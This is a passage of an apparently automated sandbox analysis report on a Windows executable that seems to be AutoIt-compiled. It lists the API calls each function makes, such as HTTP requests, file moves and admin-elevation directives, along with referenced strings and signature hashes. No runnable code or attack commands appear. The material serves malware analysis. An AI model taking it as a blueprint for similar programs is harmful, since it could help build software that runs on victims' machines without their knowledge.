                                                                                  • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 978794511-0
                                                                                  • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                  • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                  • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                  • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                  • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                  • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                  • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClearVariant
                                                                                  • String ID:
                                                                                  • API String ID: 1473721057-0
                                                                                  • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                  • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                  • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                  • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove$_memcmp
                                                                                  • String ID: '$\$h
                                                                                  • API String ID: 2205784470-1303700344
                                                                                  • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                  • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                  • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                  • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                  • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                  • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                  • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                  • __swprintf.LIBCMT ref: 0045EC33
                                                                                  • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                  Strings
                                                                                  • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                  • String ID: %4d%02d%02d%02d%02d%02d
                                                                                  • API String ID: 2441338619-1568723262
                                                                                  • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                  • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                  • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                  • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                  APIs
                                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                  • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                  • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                  • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                  • String ID: @COM_EVENTOBJ
                                                                                  • API String ID: 327565842-2228938565
                                                                                  • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                  • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                  • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                  • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                  APIs
                                                                                  • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                  • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                  • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                  • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                  • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                    • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                    • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                  • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                  • String ID: H
                                                                                  • API String ID: 3613100350-2852464175
                                                                                  • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                  • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                  • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                  • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                  APIs
                                                                                  • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                  • DestroyWindow.USER32(?), ref: 00426F50
                                                                                  • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                  • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                  • String ID: close all
                                                                                  • API String ID: 4174999648-3243417748
                                                                                  • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                  • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                  • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                  • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                  APIs
                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                                  • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                                  • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                                  • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                                  • String ID:
                                                                                  • API String ID: 1291720006-3916222277
                                                                                  • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                  • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                                  • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                                  • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                                  APIs
                                                                                  • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                                  • IsMenu.USER32(?), ref: 0045FC5F
                                                                                  • CreatePopupMenu.USER32 ref: 0045FC97
                                                                                  • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                  • String ID: 0$2
                                                                                  • API String ID: 93392585-3793063076
                                                                                  • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                  • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                  • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                  • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                  APIs
                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                  • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                  • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                  • String ID: crts
                                                                                  • API String ID: 586820018-3724388283
                                                                                  • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                  • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                  • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                  • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                  APIs
                                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                  • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                  • _wcscat.LIBCMT ref: 0044BCAF
                                                                                  • _wcslen.LIBCMT ref: 0044BCBB
                                                                                  • _wcslen.LIBCMT ref: 0044BCD1
                                                                                  • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 2326526234-1173974218
                                                                                  • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                  • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                  • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                  • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                  APIs
                                                                                    • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                  • _wcslen.LIBCMT ref: 004335F2
                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                  • GetLastError.KERNEL32 ref: 0043362B
                                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                  • _wcsrchr.LIBCMT ref: 00433666
                                                                                    • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                  • String ID: \
                                                                                  • API String ID: 321622961-2967466578
                                                                                  • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                  • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                  • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                  • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                  • API String ID: 1038674560-2734436370
                                                                                  • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                  • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                  • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                  • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                  • LoadStringW.USER32(00000000), ref: 00434060
                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                  • LoadStringW.USER32(00000000), ref: 00434078
                                                                                  • _wprintf.LIBCMT ref: 004340A1
                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                  Strings
                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
